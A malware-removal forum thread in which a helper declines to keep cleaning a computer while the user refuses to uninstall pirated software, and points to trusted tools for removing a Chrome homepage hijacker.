You have multiple infections on your computer but you have a lot of illegal software on your system, which is probably how your computer became infected. Besides being illegal, cracks/keygens are the most certain means of infecting your system, as ALL illegal software contains some form of malicious code.

This forum, as well as all the other well-respected malware removal forums, does not condone the use of illegal software. If you disregard this warning and become re-infected, we may not assist you the next time.

If you want your computer cleaned, please uninstall all the illegal software that you have downloaded and installed. When you have done this, run the following and post the log:

Run CKScanner

Download CKScanner by askey127 from here & save it to your Desktop.

  • double-click CKScanner.exe then click Search For Files
  • when the cursor hourglass disappears, click Save List To File
  • a message box will verify the file saved
  • double-click the CKFiles.txt icon on your desktop then copy/paste the contents in your next reply.

Satchfan

 


My help is always free of charge. If you are happy with the help provided, if you wish you can make a donation to buy me a beer.


#7 Neki

Neki
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Philippines
  • Local time:09:22 PM

Posted 03 February 2016 - 11:19 AM

Hmm, I see. Thanks for the warning Satchfan but frankly, I couldn't do that. I badly need these programs and I don't really have the money to own them legally. If I get re-infected and you or anyone else won't assist me the next time I ask for help, then I don't really mind. It's fine by me. After all, all I ever asked for anyway is if it's safe for those registry files detected by AdwCleaner to undergo the 'cleaning' process, which I assume it is. At least now, I learned some new stuff that could be useful.

 

My computer still works fine and it was, even before I initiated the steps you required me to do. It's been fine ever since, actually. Nothing really computer-threatening malwares or other viruses have affected my computer nor have they messed it up. The only problem were those annoying ads that started popping up and that's all I wanted to get rid of.

 

I don't mind not getting my computer fully cleaned. This is my own choice and I know the repercussions and if ever there are other dangerous stuff left, then I'm taking the risk because I am not going to give up the programs.

 

But thanks a lot for helping me out at least.


Edited by Neki, 04 February 2016 - 08:48 AM.


#8 satchfan

satchfan

  • Malware Response Team
  • 2,661 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Devon, UK
  • Local time:02:22 PM

Posted 03 February 2016 - 12:46 PM

thanks a lot for helping me out at least.

You're welcome.

 

I understand but I'm afraid that if I help you with these items still on your computer it would be seen as condoning/encouraging piracy.

 

You say tour computer works fine but there are signs of this and websearch.searchsun.info which hijacks your IE/Chrome/Firefox and changes your homepage. In your case it is Chrome that is infected.

You would be wise to uninstall the pirated software, (albeit temporarily as it is not my business what you do when you leave here).

If you still choose not to uninstall the programs, at least look up these infections but do not use ANY program that you have not seen used on our forum as there are some suspect programs that will claim to rid you of these infections but can/will do more damage than good.

Whatever your decision, thank you for replying and I wish you luck.

Regards

Satchfan


Edited by satchfan, 03 February 2016 - 12:49 PM.

My help is always free of charge. If you are happy with the help provided, if you wish you can make a donation to buy me a beer.


#9 Neki

Neki
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Philippines
  • Local time:09:22 PM

Posted 04 February 2016 - 10:09 AM

I wish you luck.

Thank you very much.

 

Thanks also for understanding but I deeply apologize for the piracy I'm doing. I'm simply a student with nothing to earn money from but I would really be willing to actually buy software products for my PC if I'll ever get a job someday from which I can earn. At the moment, I'm just desperate.

 

Without any doubts, I am firm with my decision to keep the programs installed.

do not use ANY program that you have not seen used on our forum as there are some suspect programs that will claim to rid you of these infections but can/will do more damage than good.

I'm not really sure by what you're saying here, but do you mean to say that I also shouldn't continue using AdwCleaner, JRT and FRST anymore?


Edited by Neki, 05 February 2016 - 07:23 AM.


#10 satchfan

satchfan

  • Malware Response Team
  • 2,661 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Devon, UK
  • Local time:02:22 PM

Posted 04 February 2016 - 12:30 PM

I'm not really sure by what you're saying here, but do you mean to say that I also shouldn't continue using AdwCleaner, JRT and FRST anymore?

 

Yes those programs are safe, (although FRST is not much good to you if you don't know what the results mean).

 

What I meant was that if you look up information about some infections on the Internet, there are "solutions" which suggest running "clean-up" programs for those infections; however, those clean-up programs are generally not effective or safe.

 

Only use those that you have seen being used on this forum, eg AdwCleaner, Junkware Removal tool, Malwarebytes or a good online scan like Eset Online Scanner. Those are all safe for you to use.

 

Satchfan


My help is always free of charge. If you are happy with the help provided, if you wish you can make a donation to buy me a beer.


#11 Neki

Neki
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Philippines
  • Local time:09:22 PM

Posted 05 February 2016 - 09:11 AM

Ah, got it. Yeah, I actually don't mind those clean-up programs too. Just by looking at them, I could already tell that they seem fake and couldn't be trusted. That's why I scour the net and search forums to find ones that are reliable.

 

Well...for the last time, thank you, thank you very much. It's been a big help. And to top it off, amen to you and the whole Bleepingcomputer community. :)


Edited by Neki, 05 February 2016 - 09:19 AM.


#12 satchfan

satchfan

  • Malware Response Team
  • 2,661 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Devon, UK
  • Local time:02:22 PM

Posted 05 February 2016 - 09:29 AM

You're welcome. Sorry I couldn't do more.

 

Nina


My help is always free of charge. If you are happy with the help provided, if you wish you can make a donation to buy me a beer.


#13 satchfan

satchfan

  • Malware Response Team
  • 2,661 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Devon, UK
  • Local time:02:22 PM

Posted 05 February 2016 - 09:32 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.

My help is always free of charge. If you are happy with the help provided, if you wish you can make a donation to buy me a beer.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users